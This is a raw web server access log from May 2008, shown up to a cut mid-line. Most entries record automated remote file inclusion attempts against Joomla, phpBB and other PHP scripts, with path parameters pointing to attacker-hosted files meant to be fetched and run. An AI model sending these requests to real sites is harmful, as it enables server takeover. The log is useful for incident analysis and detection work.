198.106.9.72 - - [01/May/2008:09:31:46 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.204.216 - - [01/May/2008:09:31:50 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.204.216 - - [01/May/2008:09:31:50 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.204.216 - - [01/May/2008:09:31:50 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.204.216 - - [01/May/2008:09:31:51 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.204.216 - - [01/May/2008:09:31:51 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.204.216 - - [01/May/2008:09:31:51 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
64.141.117.79 - - [01/May/2008:09:31:52 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.117.79 - - [01/May/2008:09:31:52 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.117.79 - - [01/May/2008:09:31:52 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:31:53 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:31:53 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:31:54 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
64.141.117.79 - - [01/May/2008:09:31:55 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:31:59 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
74.53.137.18 - - [01/May/2008:09:31:59 -0700] "GET /codebb/lang_select?phpbb_root_path=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
198.106.204.216 - - [01/May/2008:09:32:08 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.204.216 - - [01/May/2008:09:32:09 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:32:10 -0700] "GET /logs/access_080218.log//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:32:33 -0700] "GET /logs/access_080211.log/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:32:33 -0700] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:32:38 -0700] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:33:02 -0700] "GET /logs/access_080309.log/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:33:21 -0700] "GET /logs/access_080218.log//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.22.96 - - [01/May/2008:09:33:32 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.7.166 - - [01/May